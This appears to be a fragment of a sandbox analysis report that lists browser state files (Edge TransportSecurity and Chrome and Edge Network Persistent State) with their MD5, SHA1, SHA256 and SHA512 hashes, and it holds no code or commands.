SHA512 8f07ff20e413ae9eb00d44bf83f5c6cf24409cb11bbe85a75abbd241cd6b4102d0fab8ccbe3d252d5abfc5be2b6ddfcb074ad0b194d7148eafffcc219fe00d42

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 35dc3f0b869b25717704bcca9491db0f
SHA1 d580a56d5632402c81e6b4dcfb0c0c341d541b6b
SHA256 4626264b65f3594a79a3d288c617311d0f1bf7adef3fecc14e1c834a00b774da
SHA512 57690d0a1df95804fbf94afea93aecdd37b5d462796efb7c2a5270ac8fa2fbbab89ad4d4c11e6284a8530ea7fdac3fe52c1b019b8833e2adb508ad9a898e99df

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 250ab213a7926e7b67849f4ad8015889
SHA1 2ef21bac45e3be4285ff517389dd471149067981
SHA256 d47216f5f6fe41099e1682fcdf44f408f875ca6b803baaf72fc71db8601cb961
SHA512 969ff0a50aadbea9f728781173cec22059ac5d65b28a3b680e3e42dba92411f5d6ad4bfa78ecf7f5d657429be8ace81643e1c4bc52ebb2d4632f552818c9163f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 2515914bfba7b628d195cc3160df99e9
SHA1 196d72b483100307b17f152462b67053d50bf7fc
SHA256 060bfc92d164a6b08a146eb7415e8f2aa243a19c4ea0b5976a281275c5bebbb6
SHA512 2e5f8616c31eae1b9bfb9a442a01ea3eaca9ad858caadd4f75485cbbc6d8e8433c0285de3c1cefe380ebd46482a91507318a243bbfdfdfb2c8e4006ca9738d32

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 cec315f1e441d6ebc6a39ab6dc351e47
SHA1 1b81a9c5583b617f4e5549f651902d9fadba1c60
SHA256 61f3dc351b04a0da2cb568b4b098f4e2c0cf35b5662c82f20c1c0d44232e0826
SHA512 bf8a09d8805dbbd148b0d5c257145476f6411a7b94901cca41ccdd6453ce029a10b1122d103d7b25f8ba4b0a97f72a0300399d05f91a6e0e2ccad88e45ce0ed0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 7e4a88f6cbb817e733d6a6d40250956a
SHA1 6e6baacdd87a294a96e7e00fe7bf229aa4d2d749
SHA256 f2a5e88624e4b0959a8136b7d229af841f81dd077c366c057d9d08ca6a13388e
SHA512 647b38217813c21fc4c7ee217ae92b2e499c3853de64c5cb33fa729de0bad555f5d469a8ee6bf6c9892040514e2d1076b8927eec12a896a7683b1bfb39d33451

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 e9c539764c0e3fe14c1649b9ee057ea5
SHA1 0ce75e23e65fdeba81df2814e02aaf508c720b02
SHA256 f4fa6084ab91970434c5af3481943a59eccc1d0ed1d09dd02a07a5d7ffb1e5c4
SHA512 d0ed96d6199cb2ad4625d031c0823a0d2c020ab729c03b9bdfd9ec7510d70d9a2ee868ff3a05e3afa3dc7179451f6f4ded0c28379309e0f001968e198944e2ed

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 51e1419660064be094c45f674b9084cd
SHA1 8cb7dd9e66b34585a3910eba91db6714ff054bb3
SHA256 1894cf9e281ed55334e6766929933bcba0bafdd87468db71efabdb7d03155a54
SHA512 95069da1e460d552e710ae97927dfc1ab9e83518190d5f2f6f44c7d35abe5feab66ebb7c238fe5021dcda087dc754b0cbcca98611406b6fb091dabf246cf18f5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 3f45ac4a3e3fa854d48e07df95ebc9d6
SHA1 83bfcaabb046f956db03ba3e6e16a015cb4cca6f
SHA256 459ae06d9465bad4f5a8a738a6c28a73596c84ad7faaf6342cdcc582d956ea93
SHA512 e5db043cd7e089fcef49401ce95d552fb79ffb1809c0d19a850198458bc5150c0966c4c0cdaf8606fbeb963f59681316c9b2e75f0e7f7386d9e9bd8da4af9f2b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 2d00f51a1ba334e38577194c09e3543e
SHA1 03afffaaab774d779d770820d55094db80fde67f
SHA256 69b93336a3199d7d159acbb945d726e1a69371c36c8ed1ab3f504356c1373017
SHA512 e8a465708eb6a87fc1412782539e0715971d6187b5a3eba381ae5b2b95de0e0d3fb69e8454062dd9139e3028cefc73bc4faf314c378182ca13a6f03a97630aa0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 027ea71c8edffafe271a6d700d632bec
SHA1 b831026cbcd3e0ec0bd487acc1d12c4d40d8d4e2
SHA256 d53c33b5c4ffacb12b392bebcd33cc9ca84df69cda84893b3eb389e33b3bb89c
SHA512 4d807a4cb86e734f01169bc83d531d51a8b748b9d1181a9ab418e465fba294bf70347196c40c6b788d457cb460954d7c8765f5cc1be9a6a3b841f8adb18324e4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 8517859dd66cc9f2c4276d5a526b1794
SHA1 3d5b67e8347f50b1a6bb8896ffc1cad4e2aa1819
SHA256 afc5cda03932cd934f76ef2f21bf666af8132c3132c4e2f7dcb275d5e7b109ad
SHA512 049c9b94c2aa69b51314b8177bcfa0d9d6a758c9337321454895a24daeea68575e52dab49086e1f18c2f8b8d01e9e501dbc06ae8d9b1c4a44f4d1a41dde3ba78

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 bd61f8c5ecc9c2e913b51e22b9ca9ec1
SHA1 520b6fdbfa580214e97ee715fa23c4d32cdbf3f6
SHA256 989da36e3fefb51d09c66cf0b27534eab4a2c33dcb16129591da9247c5bc9758
SHA512 2d8cd8f42a0e184eebd2322a8870e06e18d6941a606570b823d7df6f612fddd2bd4d5daefd2f621efc1df7c9166fc07e6da7643abcef0d9df2e13587891be149

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 a421f375072c64180af9b72d446a7fd6
SHA1 9e4accd92489401c80f7bc7b99b38fe843abda9a
SHA256 619b89fde2e8605a7b77e6cb58c9e3f906a8ca4410e6b47b153bc6bd2cb8b35f
SHA512 88f24c708ca6f11d3a0888c9a621568ed42284680884fd6bc788a496dfa8c1306f66072a370f958c3626123ab52dda235e84d3159834eb756565c1636d158a3f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 a496ac166dae695cc1031730733f1172
SHA1 4e600ee89b57e4e0d85e4eb69dfc9f36f7329373
SHA256 796161edf54e66ef9e52f9036b59826ac9b9968793b6135a7355422b0a7389e5
SHA512 dcfbdc9ed0cdf5c21b89fccfb5f99ac12c9a6b5a7bef21be68bf2e10afe6638a66b539b26f14a07d6c6d2b879d0cc08b325c8d0130202907ad059a0f14690914

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 e3d00ae0a9c6973d31f4a9fcea2e5c0e
SHA1 6b21f59d04148a0a1d1f289f8dec026450e91a08
SHA256 c774b3d395c78964ec699038d067a9db1616ca8cbd2f9e7a227796ba78858932
SHA512 4c2e565106137fe9d67e61634b94fda5c0267c596443e911e27345f3d037a8eda4391bda94d516e2b6c99e081dbb1d9268971922e747c7144a84776cc46f2e42

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 df8d84bef9e681bb6d2fe64efccd32b8
SHA1 40a23ffee70963dc88e2c17152c010380dec97d3
SHA256 e65e02927ac15592466a769d65cb2940c28d49bbe8aba6b4de80cf65fa868bc4
SHA512 f8017b18b3ad7d45ea994aed5d41a9e434ed11cd637038176573a5ad9dca2db29eb6a089cb4abca492dfe6c5789e06dbb128512388dbc60eb141cd4948f781fb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 ac88614ea408eac6b565fc6f5cbbb4bb
SHA1 048fe55906790993f2cd9766fe76ace2b0f14a5c
SHA256 75328bfd3aec55309bff9c0d9f6ed27a9fc4f50f9d5a1c77835b6781cff2b099
SHA512 763802a4b2575599bad714fa467ef5b23b313a8102dc24edb85852cdc42d9ba62002f3d5886ed7fc33a319cd0ffa652256f0cde102b541e636b320bd873f024b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 d6500b996a0999640aba6c0fc6522818
SHA1 1fdf199fd5d104ed9818d589c458c87c8c21d374
SHA256 32310b3c20fc179f9cbae585f552e116a7ad37eda3b029f9fd106cee1294fcdb
SHA512 46075a5a7805cec9ed0a19ef7be0df239aea3f712977b25c06aad57f8d99bc073053fe3970189f598e51cd44e48832174c7f9ffb46060000879285e447a3a556

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 cbc729b5c0a6f80d7f784185b8e0d0fb
SHA1 adad34f070e6e0761ffdd708800b7b0e84f46c97
SHA256 7927699307674382d734f8d8dbec1a2f076c633b59efa93a8c045afe773f22f1
SHA512 35cf637078601c8239f89b1a5aac0639e68a887495cf19934f9952fdecec27dd2603b927241f4c8d5a5d281045a8d62fd4499c52bfd044921029d5a0f0772826

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 19a04754aa1f586d475c57940824978a
SHA1 39aa9c8a69eb474105f5330bf4f504a45064470e
SHA256 6d800ed481821a9cb84e95bb718cdc7d6716e7dab9008b4e35f0f06971888c5a
SHA512 9ca6681f62211e658ca39abcccf0a2e67e07ffaf3efe29299a065752eee46668648d358b52345471333a9c4f9d11327a6dba408d16559ffb107ceefa5c728f55

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 7983b1831d7142a655a69c5299d6fe23
SHA1 c10e3aa3ae2228560170a688ee712e0ff7b4cb48
SHA256 21443a4732e6e66da055f531bdfb80a38a1d47606f8663b6004a8de642da24b1
SHA512 ab81cb71a207bb059489a56be1b7793c29360d9f6956d9a5d78a09d30027b8f070c8ca2732b52a6a7ed60eba12402289e7a7966c2534f9a0bf0a8e6815f4b801